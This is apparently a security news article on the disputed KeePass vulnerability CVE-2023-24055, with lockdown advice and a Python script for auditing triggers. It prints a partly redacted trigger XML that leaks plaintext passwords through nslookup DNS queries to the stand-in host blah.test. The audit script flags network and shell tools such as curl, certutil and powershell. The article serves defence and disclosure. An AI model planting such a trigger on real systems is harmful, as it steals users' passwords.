Wednesday, February 1, 2023

Password-stealing “vulnerability” reported in KeePass – bug or feature? – Naked Security


It’s been a newsworthy few weeks for password managers, those handy utilities that help you come up with a different password for every website you use, and then keep track of them all.

At the end of 2022, it was LastPass’s turn to be all over the news, when the company finally admitted that a breach it suffered back in August 2022 did indeed end up with customers’ password vaults getting stolen from the cloud service where they were backed up.

(The passwords themselves weren’t stolen, because the vaults were encrypted, and LastPass didn’t have copies of anyone’s “master key” for the backup vault files, but it was a closer shave than most people were happy to hear.)

Then it was LifeLock’s turn to be all over the news, when the company warned about what looked like a rash of password guessing attacks, probably based on passwords stolen from an entirely different website, possibly some time ago, and perhaps sold on the dark web recently.

LifeLock itself hadn’t been breached, but some of its users had, thanks to password-sharing behaviour caused by risks they might not even remember having taken.

Competitors 1Password and BitWarden have been in the news recently, too, based on reports of malicious adverts, apparently unwittingly aired by Google, that convincingly lured users to replica logon pages aimed at phishing their account details.

Now it’s KeePass’s turn to be in the news, this time for a different cybersecurity concern: an alleged vulnerability, the jargon term used for software bugs that lead to cybersecurity holes that attackers might be able to exploit for evil purposes.

Password sniffing made easy

We’re referring to it as a vulnerability here because it does have an official bug identifier, issued by the US National Institute of Standards and Technology (NIST).

The bug has been dubbed CVE-2023-24055: Attacker who has write access to the XML configuration file [can] obtain the cleartext passwords by adding an export trigger.

The claim about being able to obtain cleartext passwords, sadly, is true.

If I have write access to your personal files, including your so-called %APPDATA% directory, I can sneakily tweak the configuration section to modify any KeePass settings that you’ve already customised, or to add customisations if you haven’t knowingly changed anything…

…and I can surprisingly easily steal your plaintext passwords, either in bulk, for example by dumping the entire database as an unencrypted CSV file, or as you use them, for example by setting a “program hook” that triggers every time you access a password from the database.

Note that I don’t need Administrator privileges, because I don’t need to mess with the actual installation directory where the KeePass app itself gets stored, which is usually off-limits to regular users.

And I don’t need access to any locked-down global configuration settings.

Interestingly, KeePass goes out of its way to stop your passwords being sniffed out when you use them, including using tamper-protection and various anti-keylogger tricks that hold even against users who already have sysadmin powers.

But the KeePass software also makes it surprisingly easy to grab plaintext password data, perhaps in ways you might consider “too easy”, even for non-administrators.

It was a minute’s work to use the KeePass GUI to create a Trigger event that runs every time you copy a password into the clipboard, and to set that event to do a DNS lookup that included both the username and the plaintext password in question.

We could then copy the not-terribly-obvious XML setting for that option out of our own local configuration file into the configuration file of another user on the system, and then they too would find their passwords being leaked over the internet via DNS lookups.

Although the XML configuration data is largely readable and informative, KeePass curiously uses random data strings known as GUIDs (short for globally unique identifiers) to denote the various Trigger settings, so that even a well-informed user would need a comprehensive reference list to make sense of which triggers are set, and how.

Here’s what our DNS-leaking trigger looks like, though we redacted some of the details so you can’t get up to any immediate mischief just by copying-and-pasting this text directly:


<Trigger>
   <Guid>XXXXXXXXXXXXXXXXXXXX</Guid>
   <Name>Copy</Name>
   <Comments>Steal stuff via DNS lookups</Comments>
   <Events>
      <Event>
         <TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid>
         <Parameters>
            <Parameter>0</Parameter>
            <Parameter />
         </Parameters>
      </Event>
   </Events>
   <Conditions />
   <Actions>
      <Action>
         <TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid>
         <Parameters>
            <Parameter>nslookup</Parameter>
            <Parameter>XXXXX.XXXXX.blah.test</Parameter>
            <Parameter>True</Parameter>
            <Parameter>1</Parameter>
            <Parameter />
         </Parameters>
      </Action>
   </Actions>
</Trigger>

With this trigger active, accessing a KeePass password causes the plaintext to leak out in an unobtrusive DNS lookup to a domain of my choice, which is blah.test in this example.

Note that real-life attackers would almost certainly scramble or obfuscate the stolen text, which would not only make it harder to spot when DNS leaks were happening, but would also handle passwords containing non-ASCII characters, such as accented letters or emojis, that can’t otherwise be used in DNS names.

But is it really a bug?

The tricky question, however, is, “Is this really a bug, or is it just a powerful feature that could be abused by someone who would already need at least as much control over your own data as you have yourself?”

Simply put, is it a vulnerability if someone who already has control of your account can mess with data that your account is supposed to be able to access anyway?

Although you might hope that a password manager would include lots of extra layers of tamper-protection to make it harder for bugs/features of this sort to be abused, should CVE-2023-24055 really be a CVE-listed vulnerability?

If so, wouldn’t commands such as DEL (delete a file) and FORMAT need to be “bugs”, too?

And wouldn’t the very existence of PowerShell, which makes potentially dangerous behaviour much easier to provoke (try powershell get-clipboard, for instance), be a vulnerability all of its own?

That’s KeePass’s position, acknowledged by the following text that has been added to the “bug” detail on NIST’s website:

** DISPUTED ** […] NOTE: the vendor’s position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC.

What to do?

If you’re a standalone KeePass user, you can check for rogue Triggers like the “DNS Stealer” we created above by opening the KeePass app and looking through the Tools > Triggers… window.

Note that you can turn the entire Trigger system off from this window, simply by deselecting the [ ] Enable trigger system option…

…but that isn’t a global setting, so it can be turned back on again via your local configuration file, and therefore only protects you from mistakes, rather than from an attacker with access to your account.

You can force the option off for everyone on the computer, with no option for them to turn it back on themselves, by editing the global “lockdown” file KeePass.config.enforced.xml, found in the directory where the app program itself is installed.

Triggers will be forced off for everyone if your global XML enforcement file looks like this:


<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <Application>
      <TriggerSystem>
         <Enabled>false</Enabled>
      </TriggerSystem>
   </Application>
</Configuration>

(In case you’re wondering, an attacker who has write access to the application directory to reverse this change would almost certainly have enough system-level power to modify the KeePass app entirely, or to install and activate a standalone keylogger anyway.)

If you’re a network administrator tasked with locking down KeePass on your users’ computers so that it’s still flexible enough to help them, but not flexible enough for them to help cybercriminals by mistake, we recommend reading through the KeePass Security Issues page, the Triggers page, and the Enforced Configuration page.
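For admins who would rather audit than eyeball the Triggers window, here is a small defender’s script (an added example written for this article, not code from the KeePass project) that parses the trigger XML shown above and the enforced-configuration file, lists every trigger action, flags actions whose command is an executable a trigger rarely needs (the list is a heuristic chosen for this example), and reports whether the trigger system is switched off. The sample configs, GUIDs and lookup host are constructed placeholders; the script finds <Trigger> and <TriggerSystem> wherever they sit in the file rather than assuming a fixed path.

```python
import xml.etree.ElementTree as ET

# Executables a KeePass trigger action rarely has a legitimate reason to run;
# an "execute command" style action whose first parameter is one of these
# deserves a manual look. Heuristic list chosen for this example, not KeePass's.
SUSPICIOUS_COMMANDS = {"nslookup", "powershell", "pwsh", "cmd", "curl",
                       "wget", "certutil", "bitsadmin"}

def trigger_system_enabled(config_xml: str) -> bool:
    """True unless <TriggerSystem><Enabled> is explicitly 'false'."""
    node = ET.fromstring(config_xml).find(".//TriggerSystem/Enabled")
    return node is None or (node.text or "").strip().lower() != "false"

def audit_triggers(config_xml: str) -> list:
    """Return one record per <Action> of every <Trigger> in the config,
    flagging actions whose command parameter is in SUSPICIOUS_COMMANDS."""
    findings = []
    for trig in ET.fromstring(config_xml).iter("Trigger"):
        for action in trig.iter("Action"):
            params = [(p.text or "").strip() for p in action.iter("Parameter")]
            # First parameter is the command; normalise "C:\...\x.exe" to "x".
            exe = params[0].lower().rsplit("\\", 1)[-1] if params else ""
            exe = exe[:-4] if exe.endswith(".exe") else exe
            findings.append({
                "trigger": (trig.findtext("Name") or "").strip(),
                "comment": (trig.findtext("Comments") or "").strip(),
                "params": params,
                "suspicious": exe in SUSPICIOUS_COMMANDS,
            })
    return findings

# Constructed per-user config excerpt modelled on the article's trigger; GUIDs
# and the lookup host are placeholders, not real values.
SAMPLE_USER_CONFIG = """<Configuration><Application><TriggerSystem>
  <Enabled>true</Enabled><Triggers><Trigger>
    <Guid>PLACEHOLDER-GUID</Guid><Name>Copy</Name>
    <Comments>Steal stuff via DNS lookups</Comments>
    <Events><Event><TypeGuid>PLACEHOLDER-GUID</TypeGuid>
      <Parameters><Parameter>0</Parameter><Parameter /></Parameters></Event></Events>
    <Conditions />
    <Actions><Action><TypeGuid>PLACEHOLDER-GUID</TypeGuid><Parameters>
      <Parameter>nslookup</Parameter><Parameter>XXXXX.XXXXX.blah.test</Parameter>
      <Parameter>True</Parameter><Parameter>1</Parameter><Parameter />
    </Parameters></Action></Actions>
  </Trigger></Triggers></TriggerSystem></Application></Configuration>"""

# Constructed KeePass.config.enforced.xml with the trigger system forced off.
SAMPLE_ENFORCED_CONFIG = """<Configuration><Application><TriggerSystem>
  <Enabled>false</Enabled></TriggerSystem></Application></Configuration>"""
```

Feed audit_triggers() the text of the KeePass.config.xml under your %APPDATA% directory and trigger_system_enabled() the text of KeePass.config.enforced.xml from the install directory; a flagged action with a hostname parameter, as in the sample, is the DNS-leak pattern described above.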

